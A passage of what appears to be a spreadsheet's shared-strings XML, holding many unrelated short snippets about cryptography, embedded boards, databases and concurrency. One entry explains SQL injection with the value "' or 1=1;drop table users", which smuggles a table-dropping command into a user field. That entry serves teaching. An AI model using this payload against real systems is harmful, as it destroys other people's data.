#1 Raspberry Pi3 with dhcp enabled ad-hoc
#2 Raspberry Pi3 with dhcp enabled ad-hoc 
#3 Raspberry Pi3 is a moving node with managed network mode wpa_supplicant configurations which will connect to the either of those Raspberry Pi's based on which one has good signal strength and quality.</t>
  </si>
  <si>
    <t>Although it was theoritically possible to see one-way encryption with SSL 2.0 (relying on 2 cipher suites sets) and the backport of the SSL 3.0 SSL_NULL_WITH_NULL_NULL cipher suite, it is now considered almost impossible to see that case in real life.</t>
  </si>
  <si>
    <t>i don't fully understand this issue)
Concerning the quality of randomness, you could have a look at this Arduino library: http://code.google.com/p/tinkerit/wiki/TrueRandom, but, as said here: http://www.instructables.com/id/Arduino-True-Random-Number-Generator/
 this is not NIST compliant.</t>
  </si>
  <si>
    <t>Example:
Assuming the  variable came directly from the user, an attacker can cause issues by setting the value to something that would cause unexpected behavior:
userid = "' or 1=1;drop table users"
Tight coupling
Instead of keeping two distinct parts of an application separate (CSS and HTML; Business Logic and the View in an MVC application), the parts are mingled such that a change in one necessitates a change in the other.</t>
  </si>
  <si>
    <t>I have already tried combining the Uint32 for both uses but this didn't do anything either, still no play in locked/silent mode.</t>
  </si>
  <si>
    <t>A recursive mutex (reentrant mutex) is a mutex which may be locked multiple times by the same process or thread, without causing a deadlock.</t>
  </si>
  <si>
    <t>Understanding Carry vs. Overflow conditions/flags for signed vs. unsigned.</t>
  </si>
  <si>
    <t>Some applications
Cryptographic hashing relies on the low probability of any two items having the same hash value.</t>
  </si>
  <si>
    <t>if your concern regarding RSSI is due to communication range you should notice that LoRaWAN is a sub 1ghz technology that aims to be low power and Long range communication, the price is the data transference capability.</t>
  </si>
  <si>
    <t>#define BLOCK_SIZE 8
header.type = 1;                      //test value
header._buff = 1;                     //test value
byte data[BLOCK_SIZE];                //8 byte buffer to encrypt/decrypt
byte buff[32];                        //32 byte buffer to put encrypted/decrypted data into
for (uint32_t i = 0; i &lt; 4; i++){     //4 times (4 * 8 = 32)
   memcpy(data, &amp;header+(i*BLOCK_SIZE), BLOCK_SIZE);     //copy 8 bytes from header struct into data
   xteaEncrypt((uint32_t*)data);         //encrypt data
   memcpy(&amp;buff+(i*8), data, BLOCK_SIZE); //put encrypted data into the new buffer
}
memcpy(&amp;header, &amp;buff, sizeof(header));  //copy into original header for convenience
//now decrypt it back
for (uint32_t i = 0; i &lt; 4; i++){
   memcpy(data, &amp;header+(i*BLOCK_SIZE), BLOCK_SIZE);
   xteaDecrypt((uint32_t*)data);
   memcpy(&amp;buff+(i*8), data, BLOCK_SIZE);
}
memcpy(&amp;header, &amp;buff, sizeof(header));
After encryption header.type = 0xee and header._buff = C0010000.</t>
  </si>
  <si>
    <t>This way the low voltage electronics are totally protected and isolated from the high voltage stuff.</t>
  </si>
  <si>
    <t>Assuming that you got a psk based encryption, you need to increase pass buffer length to 64.</t>
  </si>
  <si>
    <t>To verify, try padding the data payload yourself with (say ) until the packet has more data than 64 bytes.</t>
  </si>
  <si>
    <t>A bit-field of type _Bool, int, signed int, or unsigned int.</t>
  </si>
  <si>
    <t>It adds NSA Suite B algoritms (including elliptic-curve cryptography) and is FIPS 140-2 certified.</t>
  </si>
  <si>
    <t>Running into an issue where GCF needs either RSA256 or ES256 for the signature of the JSON Web Token (signature appears to be the head and payload of the JWT encrypted and GCF will use the public key to verify).</t>
  </si>
  <si>
    <t>A short overview for
localization (in the context of robotics) can be found here:
http://robots.stanford.edu/papers/thrun.probrob.pdf and in more
detail here: http://www.probabilistic-robotics.org/
Since I assume you have  pre-knowledge about the room and beacon
positions, a more straight forward approach might be an
investigation of BLE fingerprinting techniques.</t>
  </si>
  <si>
    <t>*** WARNING: you are running uWSGI without its master process manager ***
your processes number limit is 7336
your memory page size is 4096 bytes
detected max file descriptor number: 1024
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
The -s/--socket option is missing and stdin is not a socket.</t>
  </si>
  <si>
    <t>Implementing shared primary key involves some work on the part of the programmer, because the primary key has to be propagated from the class table to the appropriate subclass table(s) by programmed action whenever new entries are made in the class table.</t>
  </si>
  <si>
    <t>Storage-level encryption amounts to encrypt data in the storage subsystem
and thus protects the data at rest (e.g., from storage media theft).</t>
  </si>
  <si>
    <t>Starting in J2SE 5.0, jarsigner can generate signatures that include a timestamp, thus enabling systems/deployer (including Java Plug-in) to check whether the JAR file was signed while the signing certificate was still valid.</t>
  </si>
  <si>
    <t>About PyCryptodome
PyCryptodome is a self-contained Python package of low-level cryptographic primitives, created as a fork of PyCrypto.</t>
  </si>
  <si>
    <t>I will be using it to lock and unlock a lock and I need to make sure only verified devices are able to initiate the locking and unlocking.</t>
  </si>
  <si>
    <t>From the webpage:
The primary point of dieharder (like diehard before it) is to make it easy to time and test (pseudo)random number generators, both software and hardware, for a variety of purposes in research and cryptography.</t>
  </si>
  <si>
    <t>Depending on the level of integration of
the encryption feature and the DBMS, the encryption process may incur some
change to applications.</t>
  </si>
  <si>
    <t>Since some databases dont
  support table names above a certain length, these table names will be
  automatically truncated to 64 characters and a uniqueness hash will be
  used.</t>
  </si>
  <si>
    <t>When using  the row won't actually be inserted if it results in a duplicate key.</t>
  </si>
  <si>
    <t>A Vehicle Identification Number, commonly abbreviated to VIN, is a unique code including a serial number, used by the automotive industry to identify individual motor vehicles, towed vehicles, motorcycles, scooters and mopeds as defined in ISO 3833.</t>
  </si>
  <si>
    <t>The RSACryptoServiceProvider object performs asymmetric encryption and decryption using the implementation of the RSA algorithm provided by the cryptographic service provider (CSP).</t>
  </si>
  <si>
    <t>On the Arduino side I'm using:
where the parameters are:
char dest[9]; //Destination
char v[9]; //Encrypted message
char k[17]; //Key
but my decrypted message is far away from the original message...</t>
  </si>
  <si>
    <t>This is the code I am using in the Python Project (message is a string for example "AUTH")
This is what the arduino receives:
01 65 85 84 72 16
But it should look like that:
01 41 55 54 48 10
I know that the second byte array is basically the first one just in hex representation - how would I achieve that?</t>
  </si>
  <si>
    <t>Im currently working on an Arduino/ESP8266 project which requires the AES128 encryption/decryption of specific data (small strings), the lib supports AES256 but for now I will get 128 working.</t>
  </si>
  <si>
    <t>As long as you know what kind data you've got holed up in that unsafe pointer, you can always use the various constructors of each variant to cast between the pointers.</t>
  </si>
  <si>
    <t>Regarding the question title's problem of interpreting an unsigned value as a 2's complement signed value:
First note that it's not necessary.</t>
  </si>
  <si>
    <t>To complicate matters, if a client certificate is specified in code then the lower level network functions assume the application has already taken care of this and will not prompt the user for confirmation.</t>
  </si>
  <si>
    <t>Computers hold signed integers as two's complement, so does LIS3DH, that means the value stored in this int16_t variable will have a proper sign.</t>
  </si>
  <si>
    <t>The chip uses a random number
  generator to create the key, making it virtually impossible to derive.</t>
  </si>
  <si>
    <t>`IDENTITY_INSERT` is a Sql Server database option which permits values for an identity column on a table to be explicitly specified during an Insert operation.</t>
  </si>
  <si>
    <t>Hopscotch hashing is a scheme in computer programming for resolving hash collisions of values of hash functions in a table using open addressing.</t>
  </si>
  <si>
    <t>new java synchronizer added in java 8 which apart from providing separate read and write locks also has a feature for optimistic locking for read operations.</t>
  </si>
  <si>
    <t>The referential integrity constraint mandates that the values of the foreign key attributes in one table, A, must match with corresponding values in some specified table B (which may sometimes be the same table as A).</t>
  </si>
  <si>
    <t>When debugging it becomes necessary to dump the thread state of the application, this is usually to find a deadlock, lock contention or leaking connections.</t>
  </si>
  <si>
    <t>Collection of convenience classes and primitives to help untangle evented code, plus a number of patched EM clients to make them Fiber aware.</t>
  </si>
  <si>
    <t>In any secondary tables, the key is declared both as a primary key and as a foreign key, referencing the primary key in the main table.</t>
  </si>
  <si>
    <t>Thus, selective encryption
 i.e., encrypting only portions of the database in order to decrease the encryption
overhead  is limited to the file granularity.</t>
  </si>
  <si>
    <t>JSON Web Signature (JWS) represents content secured with digital signatures or Message Authentication Codes (MACs) using JSON-based data structures.</t>
  </si>
  <si>
    <t>About PyCrypto
From the PyCrypto PyPi page:
This is a collection of both secure hash functions (such as SHA256 and
  RIPEMD160), and various encryption algorithms (AES, DES, RSA, ElGamal,
  etc.).</t>
  </si>
  <si>
    <t>You have to remember that int is actually signed 16 bit integer.</t>
  </si>
  <si>
    <t>iwconfig instead give me this:
pi@raspberrypi:~ $ iwconfig
enxb827eb269126 no wireless extensions 
wlan0    IEEE 802.11 ESSID:off/any
         Mode:Managed Access Point:Not-Associated
         Retry short limit:27 RTS thr:off Fragment thr:off
         Power Management:on
wlan1mon IEEE 802.11 Mode:Monitor Tx-Power=20dBm
         Retry short long limit:2 RTS thr:off Fragment thr:off
         Power Management:off
lo       no wireless extensions</t>
  </si>
  <si>
    <t>The HID protocol won't require (OEM) drivers  on a PC, but has much lower limits on data rates- which is OK for devices like an UPS.</t>
  </si>
  <si>
    <t>Just make sure their baud rate along with other parameters like parity, data length, etc.</t>
  </si>
  <si>
    <t>In a relational database, a sequence is an object that is used to generate unique numbers for a primary key.</t>
  </si>
  <si>
    <t>In a relational-database, a sequence is an object that is used to generate unique numbers for a primary-key.</t>
  </si>
  <si>
    <t>The purpose of the instruction set is to improve the speed of applications performing encryption and decryption using the Advanced Encryption Standard (AES).</t>
  </si>
  <si>
    <t>To generate pseudorandom integers within a range, I recommend using the exclusion method, rather than the modulo (%) method.</t>
  </si>
  <si>
    <t xml:space="preserve">
Since we're using CTR mode, we don't need to have a separate "decrypt" function; We can just call the encrypt function...</t>
  </si>
  <si>
    <t>It supports both single thread and thread-safe operation modes.</t>
  </si>
  <si>
    <t>MCrypt, and the accompanying libmcrypt, are intended to be replacements for the old Unix crypt, except that they are under the GPL and support an ever-wider range of algorithms and modes.</t>
  </si>
  <si>
    <t>Unlike cryptographic hash functions which rely on the avalanche effect of small changes in input leading to drastic changes in the output, perceptual hashes are "close" to one another if the features are similar.</t>
  </si>
  <si>
    <t>Also by default, mysqldump uses --opt, which specifies --add-drop-table, --add-locks, --create-options, --disable-keys, --extended-insert, --lock-tables, --quick, and --set-charset.</t>
  </si>
  <si>
    <t>It improves on current languages targeting this space by having a number of compile-time safety checks that produce no runtime overhead, while eliminating all data races.</t>
  </si>
  <si>
    <t>Quality assurance, or QA for short, is the systematic monitoring and evaluation of the various aspects of a project, service or facility to maximize the probability that minimum standards of quality are being attained by the production process.</t>
  </si>
  <si>
    <t>A flash drive consists of a small printed circuit board carrying the circuit elements and a USB connector, insulated electrically and protected inside a plastic, metal, or rubberized case which can be carried in a pocket or on a key chain, for example.</t>
  </si>
  <si>
    <t>The length of the returned message can vary from 8 byte to almost 200 bytes depending on what was registered.</t>
  </si>
  <si>
    <t>Related digital signature and MAC capabilities are
described in the separate JSON Web Signature (JWS) [JWS]
specification.</t>
  </si>
  <si>
    <t>WebSphere MQ AMS intercepts API calls at the application and applies encryption, and/or a digital signature prior to handing the message off to WebSphere MQ.</t>
  </si>
  <si>
    <t>My goal is to essentially spoof RSSI (Received Signal Strength Indicator) using a system of counting received packets.</t>
  </si>
  <si>
    <t>This calls for a need for encrypting the data at senders end and decrypting the data at receiver's end.</t>
  </si>
  <si>
    <t>The first case of the attacker being able to block messages from the server is harder to deal with since in this case the attacker is likely able to block further communication between client and server too - but this is a problem for any kind of communication between client and server.</t>
  </si>
  <si>
    <t>It's for a simple game-type app, I don't need encryption-strength randomness or anything, but I want it to feel fairly random.</t>
  </si>
  <si>
    <t>I am thinking of defining a unique secret number to the sensor and to "authenticate" it through a POST request... but how to achieve this?</t>
  </si>
  <si>
    <t>We are using MQTT on a low level device so changing device firmware short term is not possible but is possible long term.</t>
  </si>
  <si>
    <t>A positive integer is called k-smooth if none of its prime factors is greater than k. Smooth numbers are especially important in cryptography relying on factorization.</t>
  </si>
  <si>
    <t>The claims in a JWT
   are encoded as a JavaScript Object Notation (JSON) object that is
   used as the payload of a JSON Web Signature (JWS) structure or as the
   plaintext of a JSON Web Encryption (JWE) structure, enabling the
   claims to be digitally signed or MACed and/or encrypted.</t>
  </si>
  <si>
    <t>A distributed hash table (DHT) is a class of a decentralized distributed system that provides a lookup service similar to a hash table; (key, value) pairs are stored in a DHT, and any participating node can efficiently retrieve the value associated with a given key.</t>
  </si>
  <si>
    <t>Its complexity is the basis of the assumed security of some public key cryptography algorithms, such as RSA.</t>
  </si>
  <si>
    <t>Primary keys are defined in the ISO SQL Standard, through the PRIMARY KEY constraint.</t>
  </si>
  <si>
    <t>DEFINITION:
The Bankers algorithm is a resource allocation and deadlock avoidance algorithm developed by Edsger Dijkstra that tests for safety by simulating the allocation of predetermined maximum possible amounts of all resources, and then makes a s-state check to test for possible deadlock conditions for all other pending activities, before deciding whether allocation should be allowed to continue  source Wikipedia.</t>
  </si>
  <si>
    <t>For Java applets and Java Web Start applications a proper JAR signature is quite important, as modern browsers won't trust unsigned or self-signed Java applications.</t>
  </si>
  <si>
    <t>Fusion tables require OAuth for record inserts which the Arduino can't handle (I don't think), I want to create a little app Google's App Engine that will receive the data from the Arduino, then this app will authenticate with the Fusion table and insert a record.</t>
  </si>
  <si>
    <t>I heard that STL containers aren't thread safe, but is it enough to have a mutex lock while executing my callback function and of course a lock in the main thread while accessing the buffer/container there?</t>
  </si>
  <si>
    <t>Long story short, my project partners and I modified this code http://ediy.com.my/index.php/blog/item/15-control-arduino-via-php-easyphp to help us unlock an electrical strike lock.</t>
  </si>
  <si>
    <t>Tables in the ownCloud database on the Pi gets created so something is happening, but it never seems to create the admin user as the oc_users table is empty no matter how long I wait.</t>
  </si>
  <si>
    <t>I've URL encoded the username and the password and stitched them together in the connecting url as described on the ditto page (https://www.eclipse.org/ditto/connectivity-protocol-bindings-mqtt.html): ssl://[url-encoded-username]:[url-encoded-password]@[hostname]:[port-number].</t>
  </si>
  <si>
    <t>Once frame alignment has been achieved (or assumed), you need to continually verify the checksum of every packet in order to confirm data integrity and ensure frame alignment.</t>
  </si>
  <si>
    <t>I also assigned my messages a one byte message id which increments after each successful transmission, eliminating the possibility of accidental double sends.</t>
  </si>
  <si>
    <t>Blocking algorithms refer to an operation in multithreaded environment which temporarily restricts access to some resources to a single thread, thus blocking all other ones.</t>
  </si>
  <si>
    <t>The Password Based Key Derivation Functions are commonly used to securely "hash" a password using an iteration count and a salt.</t>
  </si>
  <si>
    <t>It contains a zlib-compresssed, byte-padded, 256-bit AES-encrypted sqlite 3.x database of a users sent and received messages.</t>
  </si>
  <si>
    <t>GUIDs or UUIDs are sometimes used when uniqueness must be guaranteed without a central "generator" for surrogate key values, such as in certain "disconnected" or replication scenarios.</t>
  </si>
  <si>
    <t>A torrent file does not contain the content to be distributed; it only contains information about those files, such as their names, sizes, folder structure, and cryptographic hash values for verifying file integrity.</t>
  </si>
  <si>
    <t>Furthermore, a proper hash function should avoid any collision, meaning that it has to be hard to find two different messages producing the same hash value.</t>
  </si>
  <si>
    <t>PGP is often used for signing, encrypting and decrypting texts, E-mails, files, directories and whole disk partitions to increase the security of e-mail communications.</t>
  </si>
  <si>
    <t>The encryption used by SSH is intended to provide confidentiality and integrity of data over an unsecured network, such as the Internet, although files leaked by Edward Snowden indicate that the National Security Agency can sometimes decrypt SSH.</t>
  </si>
  <si>
    <t>So you wrote the sector trailer as:
Key A: ,
Key B: FF FF FF FF FF FF,
Access conditions: 00 00 00
The value 00 00 00 does not represent valid access conditions.</t>
  </si>
  <si>
    <t>However, the problem that I encounter is that the data received on the computer is coded: there are bits corresponding to the address of the receiver, bits corresponding to the address of the sender, the data itself, acknowledgment bits,etc.</t>
  </si>
  <si>
    <t>ReaderWriterLockSlim is a class in Microsoft .NET framework which represents a lock that is used to manage access to a resource, allowing multiple threads for reading or exclusive access for writing.</t>
  </si>
  <si>
    <t>The update restored the ability to use Night Shift and Low Power Mode simultaneously, fixed a Bluetooth issue for iPhone SE, fixed various bugs, and improved speed and security.</t>
  </si>
  <si>
    <t>I'm using this approach in your case, assuming that the two variables you are sending are signed and with a range 16383 - -16384.</t>
  </si>
  <si>
    <t>This results in blockchain-level data integrity with Git-level data storage and energy consumption.</t>
  </si>
  <si>
    <t>Is asymmetric encryption better, like RSA?</t>
  </si>
  <si>
    <t>So I think it is unsigned because they do not say sbyte or signed byte.</t>
  </si>
  <si>
    <t>It all depends on the protocol if you should use symmetric or asymmetric encryption.</t>
  </si>
  <si>
    <t>Encryption
  provides confidentiality and integrity of data.</t>
  </si>
  <si>
    <t>Arduino UNO maximum integer value is 32767 (16-bit signed integer).</t>
  </si>
  <si>
    <t>Doing so 'signed char' will be signed, 'unsigned char' and 'char' will both be unsigned</t>
  </si>
  <si>
    <t>And since you don't need negative numbers it should be unsigned.</t>
  </si>
  <si>
    <t>0x96 is -106 when interpreted as a signed byte.</t>
  </si>
  <si>
    <t>CBC-MAC is a chaining mode to compute a signature using a secret key with a cblock cipher.</t>
  </si>
  <si>
    <t>For ciphers as in encryption, see cipher.</t>
  </si>
  <si>
    <t>SSHA is a salted variant of the SHA hashing algorithm.</t>
  </si>
  <si>
    <t>Data Encryption Standard (DES) is a cryptographic block cipher algorithm.</t>
  </si>
  <si>
    <t>The encryption table 
 |a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|
------------------------------------------------------
a|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|
------------------------------------------------------
b|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|
------------------------------------------------------
c|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|
------------------------------------------------------
d|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|
------------------------------------------------------
e|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|
------------------------------------------------------
f|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|
------------------------------------------------------
g|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|
------------------------------------------------------
h|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|
------------------------------------------------------
i|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|
------------------------------------------------------
j|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|
------------------------------------------------------
k|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|
------------------------------------------------------
l|l|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|
------------------------------------------------------
m|m|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|
------------------------------------------------------
n|n|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|
------------------------------------------------------
o|o|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|
------------------------------------------------------
p|p|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|
------------------------------------------------------
q|q|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|
------------------------------------------------------
r|r|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|
------------------------------------------------------
s|s|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|
------------------------------------------------------
t|t|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|
------------------------------------------------------
u|u|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|
------------------------------------------------------
v|v|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|
------------------------------------------------------
w|w|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|
------------------------------------------------------
x|x|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|
------------------------------------------------------
y|y|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|
------------------------------------------------------
z|z|a|b|c|d|e|f|g|h|i|j|k|l|m|n|o|p|q|r|s|t|u|v|w|x|y|
More information at Wikipedia under Vigenre cipher.</t>
  </si>
  <si>
    <t>READUNCOMMITTED and NOLOCK hints apply only to data locks.</t>
  </si>
  <si>
    <t>Authenticity is a concept of guaranteeing the generator of the data.</t>
  </si>
  <si>
    <t>Only numbers up to n can be encrypted or signed.</t>
  </si>
  <si>
    <t>Another example would be hashing collisions, where hash should be used.</t>
  </si>
  <si>
    <t>In a way, symmetric encryption concentrates confidentiality into the key, which can be short enough to be manageable (e.g.</t>
  </si>
  <si>
    <t>Rijndael(AES), TwoFish, and Cha-Cha are examples of symmetric encryption algorithms.</t>
  </si>
  <si>
    <t>Code in Python Language
Result 
according to my understanding(correct me if I am wrong),RFID tag (passive tag) has two numbers.one number was embedded on the tag and other was the hidden number.I understood how to calculate the hidden number manually .but I want to see my RFID hidden number on my serial console.I am using python code(python3 GUI)and EM-18 RFID Module.can anyone help me with this.I searched a lot in google and unable to find the solution...please help..</t>
  </si>
  <si>
    <t>This helps prevents deadlock if multiple threads have the same priority, although thread safety and performance can be compromised.</t>
  </si>
  <si>
    <t>Here are the security parameters:
esp_ble_auth_req_t auth_req = ESP_LE_AUTH_REQ_SC_BOND;     //bonding with peer device after authentication
esp_ble_io_cap_t iocap = ESP_IO_CAP_NONE;           //set the IO capability to No output No input
uint8_t key_size = 16;      //the key size should be 7~16 bytes
uint8_t init_key = ESP_BLE_ENC_KEY_MASK | ESP_BLE_ID_KEY_MASK;
uint8_t rsp_key = ESP_BLE_ENC_KEY_MASK | ESP_BLE_ID_KEY_MASK;
This only happens when i first try to connect the devices, if I try again later it works.</t>
  </si>
  <si>
    <t>Keeping track of the state of each cell/block and verifying the contents on write is part of what would typically be implemented in a wear leveling routine, and would allow you to provide data integrity for as long as possible.</t>
  </si>
  <si>
    <t xml:space="preserve"> stores a signed numeric value using 16 bits (-32,768 to 32,767).</t>
  </si>
  <si>
    <t>When using `INSERT IGNORE` the row won't actually be inserted if it results in a duplicate key.</t>
  </si>
  <si>
    <t>In the documentation for the sensor it states that the high nibble in the first byte is the checksum (calculated Xhigh+Xlow+Yhigh+Ylow+Zhigh+Zlow) but also the identification of the packet start.</t>
  </si>
  <si>
    <t>thread safe
It's better to have thread-safety out of box and do not synchronize threads manually using blocking buffer or smth.</t>
  </si>
  <si>
    <t>If you notice, there's a confidence value as well as different security levels implying there are different criteria for matching prints depending on the system parameters.</t>
  </si>
  <si>
    <t>AES (acronym of Advanced Encryption Standard) is a symmetric encryption algorithm.</t>
  </si>
  <si>
    <t>CBC defends against this by using the previously block of ciphertext as input vector (XOR'ed with the plain text), but it needs random data to XOR with the first plain text block.</t>
  </si>
  <si>
    <t>Contains functions for generating commonly-used hashes and cryptographic functions.</t>
  </si>
  <si>
    <t>Public-key systems such as PGP, SSL and many others benefit from this mathematically well-defined behavior of public key encryption.</t>
  </si>
  <si>
    <t>High-security, standards-based encryption techniques, both for unidirectional and bidirectional encryption.</t>
  </si>
  <si>
    <t>We can use start-of-frame byte and byte-stuffing (such as COBS) ( +2 bytes but I'm not sure what to do with corrupted messages )
We can use start-of-frame nibble and widen CRC to CRC8 ( +1 byte )
Something else?</t>
  </si>
  <si>
    <t>If you can increase the buffer size that may make it work, but it remains a bad idea to perform potentially blocking operations in an ISR.</t>
  </si>
  <si>
    <t>You might also want to add in a date and time field which you also calculate the hash over to prevent an attacker that can see the raw format from replaying the GET request.</t>
  </si>
  <si>
    <t>EDIT: original answer part before explanation:
Depends on compiler, compiler  options etc  can be signed or unsigned, cast via (char) can work different than You expect.</t>
  </si>
  <si>
    <t>For example (with 8 bit resolution):
0 &lt;=&gt; 0
1 &lt;=&gt; 128
2 &lt;=&gt; 64
3 &lt;=&gt; 192
4 &lt;=&gt; 32
etc
It's very easy to move forward and backward in the sequence, and is much much faster than invoking encryption or hash functions.</t>
  </si>
  <si>
    <t>Referential integrity is a property of data which requires the value of an attribute/column of a relation table to exist as a value of another attribute/column in another relation table</t>
  </si>
  <si>
    <t>Constant time functions are needed in cryptography software to prevent attacks based on time measuring of the operations.</t>
  </si>
  <si>
    <t>Non VFAT-enabled operating systems can still access the files under their short file name alias without restrictions, however, the associated long file names may get lost, when files with long file names are copied under non VFAT-aware operating systems.</t>
  </si>
  <si>
    <t>iBeacons can be identified by three values they are broadcasting
UUID(16 Byte)
Major value(2 Byte)
Minor value(2 Byte)
iBeacons can be used for indoor location system.</t>
  </si>
  <si>
    <t>It was designed from the ground up to provide the highest level of security for heavily-invested Bitcoin users, while still maintaining a high degree of usability and convenience.</t>
  </si>
  <si>
    <t>The software fits easily into L1 cache, so contention between cores is negligible: a quad-core 2.4GHz Westmere verifies 71000 signatures per second, while keeping the maximum verification latency below 4 milliseconds.</t>
  </si>
  <si>
    <t>node-crypto should be used on questions related to cryptography api of node.js
The  module provides cryptographic functionality that includes a
  set of wrappers for OpenSSL's hash, HMAC, cipher, decipher, sign and
  verify functions.</t>
  </si>
  <si>
    <t>Cryptography operates in the logical world of computers, from which the physical world is out of reach; anybody can buy a PC, so what distinguishes one user on a network from another (as seen through a network or any other communication protocol) is what that user knows.</t>
  </si>
  <si>
    <t>NTRUEncrypt is public key cryptosystem based on lattices which is assumed to be quantum computer secure in contrast to RSA and ECC.</t>
  </si>
  <si>
    <t>Quoting:
Another approach to password-based cryptography is to construct key derivation
  techniques that are relatively expensive, thereby increasing the cost of exhaustive search.</t>
  </si>
  <si>
    <t>I then proceeded to printing hex values of:
struct fields or their first member if they are an array
whole structure as an uint8_t array
What I found is:
between channel and authmode there is always [0x2 0x3]
between authmode and ssid_hidden there is always [0x0 0x0 0x0]
It fits perfectly that there are five additional bytes, that explains the size.</t>
  </si>
  <si>
    <t>In order to achieve this the hash value must be very large so as to make it computationally infeasible to find another item that hashes to the same value.</t>
  </si>
  <si>
    <t>Dose Python have a signed 16 bit integer?</t>
  </si>
  <si>
    <t>Encrypt the sequence  with any cipher and any key.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a 16-bit signed integer and the numbers can go from 32,768 to 32,767.</t>
  </si>
  <si>
    <t>Blazing fast performance with as little as 5-15% overhead for encryption
100% of data in the database file is encrypted
Uses good security practices (CBC mode, key derivation)
Zero-configuration and application level cryptography
Broad platform support: works with C/C++, Obj-C, QT, Win32/.NET, Java, Python, Ruby, Linux,    iPhone/iOS and Android
Algorithms provided by the peer reviewed OpenSSL crypto library.</t>
  </si>
  <si>
    <t>Export from one server/database directly to another server/database
Manage user-privileges
Import text-files
Export table rows as CSV, HTML, XML, SQL, LaTeX, Wiki Markup and PHP Array
Browse and edit table-data using a comfortable grid
Bulk edit tables (move to db, change engine, collation etc.)</t>
  </si>
  <si>
    <t>Hardware Transactional Memory is a more powerful system architectures for lock-free programming, allowing a group of multiple operations (even on different addresses) to be grouped into a single atomic operation.</t>
  </si>
  <si>
    <t>The port is assumed
  to be properly configured, for example using a transparent 8-bit data
  connection without parity at 115200 Baud for a STK500.</t>
  </si>
  <si>
    <t>The XAdES4j library is an high-level, configurable and extensible Java implementation of XML Advanced Electronic Signatures</t>
  </si>
  <si>
    <t>A channel with x bps may not necessarily transmit data at x rate, since protocols, encryption, and other factors can add appreciable overhead.</t>
  </si>
  <si>
    <t>It is often implemented by hashing the objects as they are added to the set, and comparing against those hashes for operations on the set.</t>
  </si>
  <si>
    <t>I want to use the serial number for cryptographic operations.</t>
  </si>
  <si>
    <t>As I already said I only need to protect the lower priority thread from sysTicks.</t>
  </si>
  <si>
    <t>With the encryption working, I moved to randomize the padding process.</t>
  </si>
  <si>
    <t>Raspberry pi code:
But the result is...
'utf8'code can not decode byte 0xf8 in position 505: invailed start byte.</t>
  </si>
  <si>
    <t>For that one should only use truly random bits to produce a secure key.</t>
  </si>
  <si>
    <t>Try this:
This assumes all variables are signed 16 bit.</t>
  </si>
  <si>
    <t>All of these communications are with an outside world that is slow, so it behooves you not to block if you don't need to.</t>
  </si>
  <si>
    <t xml:space="preserve">
First, you pack the -200 as a signed 2-byte short int.</t>
  </si>
  <si>
    <t>Jsch most likely worked because it does not support the Elliptic Curve algorithms for SSH AFAIK.</t>
  </si>
  <si>
    <t>LCGs and other linear random number generators cannot withstand an intelligent adversary.</t>
  </si>
  <si>
    <t>The reserved member is an 8-bit unsigned integer that is not used, but must be there.</t>
  </si>
  <si>
    <t>You can lock it where it takes a high voltage programmer to un-brick it.</t>
  </si>
  <si>
    <t>Are you sure coin inserted signal is debounced?</t>
  </si>
  <si>
    <t>Thirdly, if you want to implement the encryption/decryption in , maybe this pure node.js repo can help you: anthonykirby/lora-packet.</t>
  </si>
  <si>
    <t>It's implementation-defined if char is signed or unsigned.</t>
  </si>
  <si>
    <t>The formal name of this algorithm is the Triple Data Encryption Algorithm.</t>
  </si>
  <si>
    <t>This authenticated-encryption scheme combines authenticity and confidentiality of the plaintext.</t>
  </si>
  <si>
    <t>SecureRandom is a Java class that provides a cryptographically strong random number generator (RNG).</t>
  </si>
  <si>
    <t>The signed apk is simply the unsigned apk that has been signed via the JDK jarsigner tool.</t>
  </si>
  <si>
    <t>If you are doing encryption, use the tag cipher (note spelling) or encryption.</t>
  </si>
  <si>
    <t>In a web of trust scheme, the signature is of either the user (a self-signed certificate) or other users ("endorsements").</t>
  </si>
  <si>
    <t>The functor should satisfy some laws:
 pure id &lt;*&gt; v = v                            -- Identity
